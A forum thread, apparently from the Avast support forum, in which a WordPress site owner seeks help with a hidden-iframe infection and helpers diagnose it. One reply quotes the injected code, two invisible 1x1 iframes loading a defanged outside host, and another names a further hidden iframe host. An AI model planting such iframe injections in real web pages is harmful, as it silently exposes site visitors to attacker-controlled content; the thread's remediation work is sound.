HTML:Iframe-inf Virus on my webpage

Hello virus guru’s, I have a recent problem with my wordpress webpage/blog. I have not made any changes all of last week, but yesterday I started getting Iframe-inf virus warnings when I try to browse to my webpage, or the admin page.
My wordpress is up to date, and I have disabled all the plugins, but I still have the same problem.
My web address is http://www.capitolcomputing.com , yeah I know I try to fix computers for a living, and I got a virus, but any help would be appreciated.

If it helps my Avast VPS version is 090510-0, 05/10/2009

I would ensure that you have the latest version of WordPress as old versions are vulnerable to this type of exploit as are other content management software. You should also change any passwords for ftp, control panel or content management software.

Your site has been hacked that page has had two hidden iframe (on a single line) inserted into the page source after the closing HTML tag, see image.

Please modify your post changing the link from http to hXXp to avoid accidental exposure

I just had the exact same issue, and the lovely team here helped me out well. :slight_smile: It happened early this afternoon and as of now my site is all cleaned.

Best of luck!

You can find MonsterKat’s topic here, http://forum.avast.com/index.php?topic=45133.0, some useful information from his Host.

Hi capitolcomp.

This was what Blacklist Doctor found, and why it blacklisted the site:


<iframe src="hxtp://niklejo.net/?click=ADBC80" width=1 height=1 style="visibility:hidden;position:absolute"> <iframe src="hxtp://niklejo.net/?click=A9EB25" width=1 height=1 style="visibility:hidden;position:absolute">
[/code/

polonus

After looking into the issues you mentioned I deleted the references to the offending site from the Main index template within Wordpress. I also removed all other themes as it seems they had the same problem, and I’m not using them. Also I am already running the latest version of WP 2.7.1, and changed my passwords.
I felt that would put an end to the problem but I still have the same problem, and following what one post said I tried using Blacklist Doctor, and it said the problem was still there.
Could anyone help determine my next course of action, currently I’m downloading my files by ftp so I can run a scan on them. Keep in mind that I am not web savvy, but great with computers otherwise.

I have just revisited the site and there is a 1x1 hidden iframe pointing at hXXp://klaomta.com which according to a whois is in Slovenia (Telekom Slovenije d.d.). I think that is what avast is alerting on.

This is the very last link of the page source, masquerading as a navlink ???

So it looks like there is something there still being injected into posts, have you checked your template files, index, etc. as they are frequently infected too.

If you haven’t sought advice from your Host, that really should be your first port of call.